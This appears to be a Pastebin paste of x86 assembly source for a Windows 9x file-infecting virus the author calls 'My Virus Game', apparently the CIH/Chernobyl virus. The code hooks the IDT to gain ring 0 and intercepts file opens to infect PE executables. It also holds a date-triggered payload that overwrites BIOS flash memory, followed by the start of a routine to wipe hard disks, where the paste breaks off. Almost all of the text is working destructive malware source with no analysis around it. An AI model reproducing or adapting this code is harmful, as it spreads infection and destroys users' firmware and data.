Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- OriginalAppEXE SEGMENT
- FileHeader:
- db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
- db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
- db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
- db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
- db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
- db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
- db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
- db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
- db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
- db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
- db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
- db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
- db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
- db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
- db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
- db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
- db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
- db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
- db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
- db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
- db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
- db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- dd 00000000h, VirusSize
- OriginalAppEXE ENDS
- ; ****************************************************************************
- ; * My Virus Game *
- ; ****************************************************************************
- ; *********************************************************
- ; * Constant Define *
- ; *********************************************************
- TRUE = 1
- FALSE = 0
- DEBUG = TRUE
- MajorVirusVersion = 1
- MinorVirusVersion = 4
- VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
- IF DEBUG
- FirstKillHardDiskNumber = 81h
- HookExceptionNumber = 05h
- ELSE
- FirstKillHardDiskNumber = 80h
- HookExceptionNumber = 03h
- ENDIF
- FileNameBufferSize = 7fh
- ; *********************************************************
- ; *********************************************************
- VirusGame SEGMENT
- ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
- ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
- ; *********************************************************
- ; * Ring3 Virus Game Initial Program *
- ; *********************************************************
- MyVirusStart:
- push ebp
- ; *************************************
- ; * Let's Modify Structured Exception *
- ; * Handing, Prevent Exception Error *
- ; * Occurrence, Especially in NT. *
- ; *************************************
- lea eax, [esp-04h*2]
- xor ebx, ebx
- xchg eax, fs:[ebx]
- call @0
- @0:
- pop ebx
- lea ecx, StopToRunVirusCode-@0[ebx]
- push ecx
- push eax
- ; *************************************
- ; * Let's Modify *
- ; * IDT(Interrupt Descriptor Table) *
- ; * to Get Ring0 Privilege... *
- ; *************************************
- push eax ;
- sidt [esp-02h] ; Get IDT Base Address
- pop ebx ;
- add ebx, HookExceptionNumber*08h+04h ; ZF = 0
- cli
- mov ebp, [ebx] ; Get Exception Base
- mov bp, [ebx-04h] ; Entry Point
- lea esi, MyExceptionHook-@1[ecx]
- push esi
- mov [ebx-04h], si ;
- shr esi, 16 ; Modify Exception
- mov [ebx+02h], si ; Entry Point Address
- pop esi
- ; *************************************
- ; * Generate Exception to Get Ring0 *
- ; *************************************
- int HookExceptionNumber ; GenerateException
- ReturnAddressOfEndException = $
- ; *************************************
- ; * Merge All Virus Code Section *
- ; *************************************
- push esi
- mov esi, eax
- LoopOfMergeAllVirusCodeSection:
- mov ecx, [eax-04h]
- rep movsb
- sub eax, 08h
- mov esi, [eax]
- or esi, esi
- jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
- jmp LoopOfMergeAllVirusCodeSection
- QuitLoopOfMergeAllVirusCodeSection:
- pop esi
- ; *************************************
- ; * Generate Exception Again *
- ; *************************************
- int HookExceptionNumber ; GenerateException Again
- ; *************************************
- ; * Let's Restore *
- ; * Structured Exception Handing *
- ; *************************************
- ReadyRestoreSE:
- sti
- xor ebx, ebx
- jmp RestoreSE
- ; *************************************
- ; * When Exception Error Occurs, *
- ; * Our OS System should be in NT. *
- ; * So My Cute Virus will not *
- ; * Continue to Run, it Jmups to *
- ; * Original Application to Run. *
- ; *************************************
- StopToRunVirusCode:
- @1 = StopToRunVirusCode
- xor ebx, ebx
- mov eax, fs:[ebx]
- mov esp, [eax]
- RestoreSE:
- pop dword ptr fs:[ebx]
- pop eax
- ; *************************************
- ; * Return Original App to Execute *
- ; *************************************
- pop ebp
- push 00401000h ; Push Original
- OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
- ret ; Return to Original App Entry Point
- ; *********************************************************
- ; * Ring0 Virus Game Initial Program *
- ; *********************************************************
- MyExceptionHook:
- @2 = MyExceptionHook
- jz InstallMyFileSystemApiHook
- ; *************************************
- ; * Do My Virus Exist in System !? *
- ; *************************************
- mov ecx, dr0
- jecxz AllocateSystemMemoryPage
- add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
- ; *************************************
- ; * Return to Ring3 Initial Program *
- ; *************************************
- ExitRing0Init:
- mov [ebx-04h], bp ;
- shr ebp, 16 ; Restore Exception
- mov [ebx+02h], bp ;
- iretd
- ; *************************************
- ; * Allocate SystemMemory Page to Use *
- ; *************************************
- AllocateSystemMemoryPage:
- mov dr0, ebx ; Set the Mark of My Virus Exist in System
- push 00000000fh ;
- push ecx ;
- push 0ffffffffh ;
- push ecx ;
- push ecx ;
- push ecx ;
- push 000000001h ;
- push 000000002h ;
- int 20h ; VMMCALL _PageAllocate
- _PageAllocate = $ ;
- dd 00010053h ; Use EAX, ECX, EDX, and flags
- add esp, 08h*04h
- xchg edi, eax ; EDI = SystemMemory Start Address
- lea eax, MyVirusStart-@2[esi]
- iretd ; Return to Ring3 Initial Program
- ; *************************************
- ; * Install My File System Api Hook *
- ; *************************************
- InstallMyFileSystemApiHook:
- lea eax, FileSystemApiHook-@6[edi]
- push eax ;
- int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
- IFSMgr_InstallFileSystemApiHook = $ ;
- dd 00400067h ; Use EAX, ECX, EDX, and flags
- mov dr0, eax ; Save OldFileSystemApiHook Address
- pop eax ; EAX = FileSystemApiHook Address
- ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
- mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
- mov edx, [ecx]
- mov OldInstallFileSystemApiHook-@3[eax], edx
- ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
- lea eax, InstallFileSystemApiHook-@3[eax]
- mov [ecx], eax
- cli
- jmp ExitRing0Init
- ; *********************************************************
- ; * Code Size of Merge Virus Code Section *
- ; *********************************************************
- CodeSizeOfMergeVirusCodeSection = offset $
- ; *********************************************************
- ; * IFSMgr_InstallFileSystemApiHook *
- ; *********************************************************
- InstallFileSystemApiHook:
- push ebx
- call @4 ;
- @4: ;
- pop ebx ; mov ebx, offset FileSystemApiHook
- add ebx, FileSystemApiHook-@4 ;
- push ebx
- int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
- IFSMgr_RemoveFileSystemApiHook = $
- dd 00400068h ; Use EAX, ECX, EDX, and flags
- pop eax
- ; Call Original IFSMgr_InstallFileSystemApiHook
- ; to Link Client FileSystemApiHook
- push dword ptr [esp+8]
- call OldInstallFileSystemApiHook-@3[ebx]
- pop ecx
- push eax
- ; Call Original IFSMgr_InstallFileSystemApiHook
- ; to Link My FileSystemApiHook
- push ebx
- call OldInstallFileSystemApiHook-@3[ebx]
- pop ecx
- mov dr0, eax ; Adjust OldFileSystemApiHook Address
- pop eax
- pop ebx
- ret
- ; *********************************************************
- ; * Static Data *
- ; *********************************************************
- OldInstallFileSystemApiHook dd ?
- ; *********************************************************
- ; * IFSMgr_FileSystemHook *
- ; *********************************************************
- ; *************************************
- ; * IFSMgr_FileSystemHook Entry Point *
- ; *************************************
- FileSystemApiHook:
- @3 = FileSystemApiHook
- pushad
- call @5 ;
- @5: ;
- pop esi ; mov esi, offset VirusGameDataStartAddress
- add esi, VirusGameDataStartAddress-@5
- ; *************************************
- ; * Is OnBusy !? *
- ; *************************************
- test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
- jnz pIFSFunc ; goto pIFSFunc
- ; *************************************
- ; * Is OpenFile !? *
- ; *************************************
- ; if ( NotOpenFile )
- ; goto prevhook
- lea ebx, [esp+20h+04h+04h]
- cmp dword ptr [ebx], 00000024h
- jne prevhook
- ; *************************************
- ; * Enable OnBusy *
- ; *************************************
- inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
- ; *************************************
- ; * Get FilePath's DriveNumber, *
- ; * then Set the DriveName to *
- ; * FileNameBuffer. *
- ; *************************************
- ; * Ex. If DriveNumber is 03h, *
- ; * DriveName is 'C:'. *
- ; *************************************
- ; mov esi, offset FileNameBuffer
- add esi, FileNameBuffer-@6
- push esi
- mov al, [ebx+04h]
- cmp al, 0ffh
- je CallUniToBCSPath
- add al, 40h
- mov ah, ':'
- mov [esi], eax
- inc esi
- inc esi
- ; *************************************
- ; * UniToBCSPath *
- ; *************************************
- ; * This Service Converts *
- ; * a Canonicalized Unicode Pathname *
- ; * to a Normal Pathname in the *
- ; * Specified BCS Character Set. *
- ; *************************************
- CallUniToBCSPath:
- push 00000000h
- push FileNameBufferSize
- mov ebx, [ebx+10h]
- mov eax, [ebx+0ch]
- add eax, 04h
- push eax
- push esi
- int 20h ; VXDCall UniToBCSPath
- UniToBCSPath = $
- dd 00400041h
- add esp, 04h*04h
- ; *************************************
- ; * Is FileName '.EXE' !? *
- ; *************************************
- ; cmp [esi+eax-04h], '.EXE'
- cmp [esi+eax-04h], 'EXE.'
- pop esi
- jne DisableOnBusy
- IF DEBUG
- ; *************************************
- ; * Only for Debug *
- ; *************************************
- ; cmp [esi+eax-06h], 'FUCK'
- cmp [esi+eax-06h], 'KCUF'
- jne DisableOnBusy
- ENDIF
- ; *************************************
- ; * Is Open Existing File !? *
- ; *************************************
- ; if ( NotOpenExistingFile )
- ; goto DisableOnBusy
- cmp word ptr [ebx+18h], 01h
- jne DisableOnBusy
- ; *************************************
- ; * Get Attributes of the File *
- ; *************************************
- mov ax, 4300h
- int 20h ; VXDCall IFSMgr_Ring0_FileIO
- IFSMgr_Ring0_FileIO = $
- dd 00400032h
- jc DisableOnBusy
- push ecx
- ; *************************************
- ; * Get IFSMgr_Ring0_FileIO Address *
- ; *************************************
- mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
- mov edi, [edi]
- ; *************************************
- ; * Is Read-Only File !? *
- ; *************************************
- test cl, 01h
- jz OpenFile
- ; *************************************
- ; * Modify Read-Only File to Write *
- ; *************************************
- mov ax, 4301h
- xor ecx, ecx
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; *************************************
- ; * Open File *
- ; *************************************
- OpenFile:
- xor eax, eax
- mov ah, 0d5h
- xor ecx, ecx
- xor edx, edx
- inc edx
- mov ebx, edx
- inc ebx
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- xchg ebx, eax ; mov ebx, FileHandle
- ; *************************************
- ; * Need to Restore *
- ; * Attributes of the File !? *
- ; *************************************
- pop ecx
- pushf
- test cl, 01h
- jz IsOpenFileOK
- ; *************************************
- ; * Restore Attributes of the File *
- ; *************************************
- mov ax, 4301h
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; *************************************
- ; * Is Open File OK !? *
- ; *************************************
- IsOpenFileOK:
- popf
- jc DisableOnBusy
- ; *************************************
- ; * Open File Already Succeed. ^__^ *
- ; *************************************
- push esi ; Push FileNameBuffer Address to Stack
- pushf ; Now CF = 0, Push Flag to Stack
- add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
- ; ***************************
- ; * Get OffsetToNewHeader *
- ; ***************************
- xor eax, eax
- mov ah, 0d6h
- ; For Doing Minimal VirusCode's Length,
- ; I Save EAX to EBP.
- mov ebp, eax
- push 00000004h
- pop ecx
- push 0000003ch
- pop edx
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- mov edx, [esi]
- ; ***************************
- ; * Get 'PE\0' Signature *
- ; * of ImageFileHeader, and *
- ; * Infected Mark. *
- ; ***************************
- dec edx
- mov eax, ebp
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; ***************************
- ; * Is PE !? *
- ; ***************************
- ; * Is the File *
- ; * Already Infected !? *
- ; ***************************
- ; * WinZip Self-Extractor *
- ; * doesn't Have Infected *
- ; * Mark Because My Virus *
- ; * doesn't Infect it. *
- ; ***************************
- ; cmp [esi], '\0PE\0'
- cmp dword ptr [esi], 00455000h
- jne CloseFile
- ; *************************************
- ; * The File is ^o^ *
- ; * PE(Portable Executable) indeed. *
- ; *************************************
- ; * The File isn't also Infected. *
- ; *************************************
- ; *************************************
- ; * Start to Infect the File *
- ; *************************************
- ; * Registers Use Status Now : *
- ; * *
- ; * EAX = 04h *
- ; * EBX = File Handle *
- ; * ECX = 04h *
- ; * EDX = 'PE\0\0' Signature of *
- ; * ImageFileHeader Pointer's *
- ; * Former Byte. *
- ; * ESI = DataBuffer Address ==> @8 *
- ; * EDI = IFSMgr_Ring0_FileIO Address *
- ; * EBP = D600h ==> Read Data in File *
- ; *************************************
- ; * Stack Dump : *
- ; * *
- ; * ESP => ------------------------- *
- ; * | EFLAG(CF=0) | *
- ; * ------------------------- *
- ; * | FileNameBufferPointer | *
- ; * ------------------------- *
- ; * | EDI | *
- ; * ------------------------- *
- ; * | ESI | *
- ; * ------------------------- *
- ; * | EBP | *
- ; * ------------------------- *
- ; * | ESP | *
- ; * ------------------------- *
- ; * | EBX | *
- ; * ------------------------- *
- ; * | EDX | *
- ; * ------------------------- *
- ; * | ECX | *
- ; * ------------------------- *
- ; * | EAX | *
- ; * ------------------------- *
- ; * | Return Address | *
- ; * ------------------------- *
- ; *************************************
- push ebx ; Save File Handle
- push 00h ; Set VirusCodeSectionTableEndMark
- ; ***************************
- ; * Let's Set the *
- ; * Virus' Infected Mark *
- ; ***************************
- push 01h ; Size
- push edx ; Pointer of File
- push edi ; Address of Buffer
- ; ***************************
- ; * Save ESP Register *
- ; ***************************
- mov dr1, esp
- ; ***************************
- ; * Let's Set the *
- ; * NewAddressOfEntryPoint *
- ; * ( Only First Set Size ) *
- ; ***************************
- push eax ; Size
- ; ***************************
- ; * Let's Read *
- ; * Image Header in File *
- ; ***************************
- mov eax, ebp
- mov cl, SizeOfImageHeaderToRead
- add edx, 07h ; Move EDX to NumberOfSections
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; ***************************
- ; * Let's Set the *
- ; * NewAddressOfEntryPoint *
- ; * ( Set Pointer of File, *
- ; * Address of Buffer ) *
- ; ***************************
- lea eax, (AddressOfEntryPoint-@8)[edx]
- push eax ; Pointer of File
- lea eax, (NewAddressOfEntryPoint-@8)[esi]
- push eax ; Address of Buffer
- ; ***************************
- ; * Move EDX to the Start *
- ; * of SectionTable in File *
- ; ***************************
- movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
- lea edx, [eax+edx+12h]
- ; ***************************
- ; * Let's Get *
- ; * Total Size of Sections *
- ; ***************************
- mov al, SizeOfScetionTable
- ; I Assume NumberOfSections <= 0ffh
- mov cl, (NumberOfSections-@8)[esi]
- mul cl
- ; ***************************
- ; * Let's Set Section Table *
- ; ***************************
- ; Move ESI to the Start of SectionTable
- lea esi, (StartOfSectionTable-@8)[esi]
- push eax ; Size
- push edx ; Pointer of File
- push esi ; Address of Buffer
- ; ***************************
- ; * The Code Size of Merge *
- ; * Virus Code Section and *
- ; * Total Size of Virus *
- ; * Code Section Table Must *
- ; * be Small or Equal the *
- ; * Unused Space Size of *
- ; * Following Section Table *
- ; ***************************
- inc ecx
- push ecx ; Save NumberOfSections+1
- shl ecx, 03h
- push ecx ; Save TotalSizeOfVirusCodeSectionTable
- add ecx, eax
- add ecx, edx
- sub ecx, (SizeOfHeaders-@9)[esi]
- not ecx
- inc ecx
- ; Save My Virus First Section Code
- ; Size of Following Section Table...
- ; ( Not Include the Size of Virus Code Section Table )
- push ecx
- xchg ecx, eax ; ECX = Size of Section Table
- ; Save Original Address of Entry Point
- mov eax, (AddressOfEntryPoint-@9)[esi]
- add eax, (ImageBase-@9)[esi]
- mov (OriginalAddressOfEntryPoint-@9)[esi], eax
- cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
- jl OnlySetInfectedMark
- ; ***************************
- ; * Read All Section Tables *
- ; ***************************
- mov eax, ebp
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; ***************************
- ; * Full Modify the Bug : *
- ; * WinZip Self-Extractor *
- ; * Occurs Error... *
- ; ***************************
- ; * So When User Opens *
- ; * WinZip Self-Extractor, *
- ; * Virus Doesn't Infect it.*
- ; ***************************
- ; * First, Virus Gets the *
- ; * PointerToRawData in the *
- ; * Second Section Table, *
- ; * Reads the Section Data, *
- ; * and Tests the String of *
- ; * 'WinZip(R)'...... *
- ; ***************************
- xchg eax, ebp
- push 00000004h
- pop ecx
- push edx
- mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
- add edx, 12h
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; cmp [esi], 'nZip'
- cmp dword ptr [esi], 'piZn'
- je NotSetInfectedMark
- pop edx
- ; ***************************
- ; * Let's Set Total Virus *
- ; * Code Section Table *
- ; ***************************
- ; EBX = My Virus First Section Code
- ; Size of Following Section Table
- pop ebx
- pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
- pop ecx ; ECX = NumberOfSections+1
- push edi ; Size
- add edx, ebp
- push edx ; Pointer of File
- add ebp, esi
- push ebp ; Address of Buffer
- ; ***************************
- ; * Set the First Virus *
- ; * Code Section Size in *
- ; * VirusCodeSectionTable *
- ; ***************************
- lea eax, [ebp+edi-04h]
- mov [eax], ebx
- ; ***************************
- ; * Let's Set My Virus *
- ; * First Section Code *
- ; ***************************
- push ebx ; Size
- add edx, edi
- push edx ; Pointer of File
- lea edi, (MyVirusStart-@9)[esi]
- push edi ; Address of Buffer
- ; ***************************
- ; * Let's Modify the *
- ; * AddressOfEntryPoint to *
- ; * My Virus Entry Point *
- ; ***************************
- mov (NewAddressOfEntryPoint-@9)[esi], edx
- ; ***************************
- ; * Setup Initial Data *
- ; ***************************
- lea edx, [esi-SizeOfScetionTable]
- mov ebp, offset VirusSize
- jmp StartToWriteCodeToSections
- ; ***************************
- ; * Write Code to Sections *
- ; ***************************
- LoopOfWriteCodeToSections:
- add edx, SizeOfScetionTable
- mov ebx, (SizeOfRawData-@9)[edx]
- sub ebx, (VirtualSize-@9)[edx]
- jbe EndOfWriteCodeToSections
- push ebx ; Size
- sub eax, 08h
- mov [eax], ebx
- mov ebx, (PointerToRawData-@9)[edx]
- add ebx, (VirtualSize-@9)[edx]
- push ebx ; Pointer of File
- push edi ; Address of Buffer
- mov ebx, (VirtualSize-@9)[edx]
- add ebx, (VirtualAddress-@9)[edx]
- add ebx, (ImageBase-@9)[esi]
- mov [eax+4], ebx
- mov ebx, [eax]
- add (VirtualSize-@9)[edx], ebx
- ; Section contains initialized data ==> 00000040h
- ; Section can be Read. ==> 40000000h
- or (Characteristics-@9)[edx], 40000040h
- StartToWriteCodeToSections:
- sub ebp, ebx
- jbe SetVirusCodeSectionTableEndMark
- add edi, ebx ; Move Address of Buffer
- EndOfWriteCodeToSections:
- loop LoopOfWriteCodeToSections
- ; ***************************
- ; * Only Set Infected Mark *
- ; ***************************
- OnlySetInfectedMark:
- mov esp, dr1
- jmp WriteVirusCodeToFile
- ; ***************************
- ; * Not Set Infected Mark *
- ; ***************************
- NotSetInfectedMark:
- add esp, 3ch
- jmp CloseFile
- ; ***************************
- ; * Set Virus Code *
- ; * Section Table End Mark *
- ; ***************************
- SetVirusCodeSectionTableEndMark:
- ; Adjust Size of Virus Section Code to Correct Value
- add [eax], ebp
- add [esp+08h], ebp
- ; Set End Mark
- xor ebx, ebx
- mov [eax-04h], ebx
- ; ***************************
- ; * When VirusGame Calls *
- ; * VxDCall, VMM Modifies *
- ; * the 'int 20h' and the *
- ; * 'Service Identifier' *
- ; * to 'Call [XXXXXXXX]'. *
- ; ***************************
- ; * Before Writing My Virus *
- ; * to File, I Must Restore *
- ; * them First. ^__^ *
- ; ***************************
- lea eax, (LastVxDCallAddress-2-@9)[esi]
- mov cl, VxDCallTableSize
- LoopOfRestoreVxDCallID:
- mov word ptr [eax], 20cdh
- mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
- mov [eax+2], edx
- movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
- sub eax, edx
- loop LoopOfRestoreVxDCallID
- ; ***************************
- ; * Let's Write *
- ; * Virus Code to the File *
- ; ***************************
- WriteVirusCodeToFile:
- mov eax, dr1
- mov ebx, [eax+10h]
- mov edi, [eax]
- LoopOfWriteVirusCodeToFile:
- pop ecx
- jecxz SetFileModificationMark
- mov esi, ecx
- mov eax, 0d601h
- pop edx
- pop ecx
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- jmp LoopOfWriteVirusCodeToFile
- ; ***************************
- ; * Let's Set CF = 1 ==> *
- ; * Need to Restore File *
- ; * Modification Time *
- ; ***************************
- SetFileModificationMark:
- pop ebx
- pop eax
- stc ; Enable CF(Carry Flag)
- pushf
- ; *************************************
- ; * Close File *
- ; *************************************
- CloseFile:
- xor eax, eax
- mov ah, 0d7h
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; *************************************
- ; * Need to Restore File Modification *
- ; * Time !? *
- ; *************************************
- popf
- pop esi
- jnc IsKillComputer
- ; *************************************
- ; * Restore File Modification Time *
- ; *************************************
- mov ebx, edi
- mov ax, 4303h
- mov ecx, (FileModificationTime-@7)[esi]
- mov edi, (FileModificationTime+2-@7)[esi]
- call ebx ; VXDCall IFSMgr_Ring0_FileIO
- ; *************************************
- ; * Disable OnBusy *
- ; *************************************
- DisableOnBusy:
- dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
- ; *************************************
- ; * Call Previous FileSystemApiHook *
- ; *************************************
- prevhook:
- popad
- mov eax, dr0 ;
- jmp [eax] ; Jump to prevhook
- ; *************************************
- ; * Call the Function that the IFS *
- ; * Manager Would Normally Call to *
- ; * Implement this Particular I/O *
- ; * Request. *
- ; *************************************
- pIFSFunc:
- mov ebx, esp
- push dword ptr [ebx+20h+04h+14h] ; Push pioreq
- call [ebx+20h+04h] ; Call pIFSFunc
- pop ecx ;
- mov [ebx+1ch], eax ; Modify EAX Value in Stack
- ; ***************************
- ; * After Calling pIFSFunc, *
- ; * Get Some Data from the *
- ; * Returned pioreq. *
- ; ***************************
- cmp dword ptr [ebx+20h+04h+04h], 00000024h
- jne QuitMyVirusFileSystemHook
- ; *****************
- ; * Get the File *
- ; * Modification *
- ; * Date and Time *
- ; * in DOS Format.*
- ; *****************
- mov eax, [ecx+28h]
- mov (FileModificationTime-@6)[esi], eax
- ; ***************************
- ; * Quit My Virus' *
- ; * IFSMgr_FileSystemHook *
- ; ***************************
- QuitMyVirusFileSystemHook:
- popad
- ret
- ; *************************************
- ; * Kill Computer !? ... *^_^* *
- ; *************************************
- IsKillComputer:
- ; Get Now Day from BIOS CMOS
- mov al, 07h
- out 70h, al
- in al, 71h
- xor al, 26h ; ??/26/????
- IF DEBUG
- jmp DisableOnBusy
- ELSE
- jnz DisableOnBusy
- ENDIF
- ; **************************************
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; **************************************
- ; ***************************
- ; * Kill BIOS EEPROM *
- ; ***************************
- mov bp, 0cf8h
- lea esi, IOForEEPROM-@7[esi]
- ; ***********************
- ; * Show BIOS Page in *
- ; * 000E0000 - 000EFFFF *
- ; * ( 64 KB ) *
- ; ***********************
- mov edi, 8000384ch
- mov dx, 0cfeh
- cli
- call esi
- ; ***********************
- ; * Show BIOS Page in *
- ; * 000F0000 - 000FFFFF *
- ; * ( 64 KB ) *
- ; ***********************
- mov di, 0058h
- dec edx ; and al,0fh
- mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
- call esi
- ; ***********************
- ; * Show the BIOS Extra *
- ; * ROM Data in Memory *
- ; * 000E0000 - 000E01FF *
- ; * ( 512 Bytes ) *
- ; * , and the Section *
- ; * of Extra BIOS can *
- ; * be Writted... *
- ; ***********************
- lea ebx, EnableEEPROMToWrite-@10[esi]
- mov eax, 0e5555h
- mov ecx, 0e2aaah
- call ebx
- mov byte ptr [eax], 60h
- push ecx
- loop $
- ; ***********************
- ; * Kill the BIOS Extra *
- ; * ROM Data in Memory *
- ; * 000E0000 - 000E007F *
- ; * ( 80h Bytes ) *
- ; ***********************
- xor ah, ah
- mov [eax], al
- xchg ecx, eax
- loop $
- ; ***********************
- ; * Show and Enable the *
- ; * BIOS Main ROM Data *
- ; * 000E0000 - 000FFFFF *
- ; * ( 128 KB ) *
- ; * can be Writted... *
- ; ***********************
- mov eax, 0f5555h
- pop ecx
- mov ch, 0aah
- call ebx
- mov byte ptr [eax], 20h
- loop $
- ; ***********************
- ; * Kill the BIOS Main *
- ; * ROM Data in Memory *
- ; * 000FE000 - 000FE07F *
- ; * ( 80h Bytes ) *
- ; ***********************
- mov ah, 0e0h
- mov [eax], al
- ; ***********************
- ; * Hide BIOS Page in *
- ; * 000F0000 - 000FFFFF *
- ; * ( 64 KB ) *
- ; ***********************
- ; or al,10h
- mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
- call esi
- ; ***************************
- ; * Kill All HardDisk *
- ; ***************************************************
- ; * IOR Structure of IOS_SendCommand Needs *
- ; ***************************************************
- ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
